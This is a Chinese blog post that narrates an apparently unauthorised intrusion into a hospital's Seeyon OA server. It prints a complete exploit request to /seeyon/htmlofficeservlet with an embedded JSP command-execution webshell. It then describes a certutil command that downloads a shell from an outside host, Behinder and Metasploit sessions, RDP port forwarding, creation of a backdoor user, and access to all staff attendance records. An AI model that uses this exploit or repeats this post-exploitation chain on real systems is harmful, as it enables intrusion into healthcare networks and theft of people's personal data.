对某医院进行测试

  • 内容
  • 相关
直接贴POC吧
POST /seeyon/htmlofficeservlet HTTP/1.1
Content-Length: 1121
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: xxxxxxxxx
Pragma: no-cache

DBSTEP V3.0     355             0               824             DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdziouP4KGzUCXPBT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
<%@ page contentType="text/html; charset=UTF-8" %> <%@ page import="java.io.*" %> <% String cmd = request.getParameter("command"); String output = ""; if (cmd !=null && cmd != "") { String[] command = System.getProperty("os.name").toLowerCase().indexOf("windows")>-1 ? new String[] {"cmd.exe", "/c", cmd} : new String[] {"/bin/sh", "-c", cmd}; String s = null; try { Process p = Runtime.getRuntime().exec(command); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); while ((s = sI.readLine()) != null) { output += s +"\r\n"; } BufferedReader sI1 = new BufferedReader(new InputStreamReader(p.getErrorStream())); while ((s = sI1.readLine()) != null) { output += s +"\r\n"; } } catch (IOException e) { e.printStackTrace(); } } else output="<h1>:-)</h1>"; %>  <%=output%> 6e4f045d4b8506bf492ada7e3390d7ce

直接上马,然后就是一个RCE了,嘿嘿直接adm权限

1.png
2.png
之前我想的是看能不能找找他的数据库文件,然后登陆进去,然而dir c:... 命令,只要有\就执行不了,后面把\弄成url编码,%5c,才顺利执行,但在里面翻了一圈,没什么有用的信息。
后面拍脑袋一想 ,直接给他远程下载一个小马文件下来。
我使用的命令是:certutil -urlcache -split -f http://ip/shell.jspx

之后把文件给他移动到web路径下去,致远oa一般web路径为:

xxxxxx\ApacheJetspeed\webapps\seeyon\


ok直接冰蝎连接之

3.png

冰蝎可以直接弹msf会话,直接弹出来,vps监听,3389开启,给他转发出来
直接用msf portfward -p xxx -l xxx 转发,抓管理员的密码hash我用的是cs,直接cs生成exe文件,上传呆了几分钟,然后就下线了,装有360 不会免杀太菜了 sxxt!!

4.png

转发登陆之,第一次输入administrator 登陆失败 第二次加域前缀 OAsystem\adminstrator 也登陆失败,纳闷了 不知为何,administrator按理说应该是在rdp组里。
后面就只有在新建一个用户了,然后加入远程用户组,登陆之。

5.png

他们医院桌面有个考勤系统,考勤信息查看、下载、上传所有人的信息

6.png

7.png

后续想漫游一波,然而他们网站挂掉了 1!! gkd

本文标签:

版权声明:若无特殊注明,本文皆为《T0ex4》原创,转载请保留文章出处。

本文链接:对某医院进行测试 - https://www.k1q.cn/post-46.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注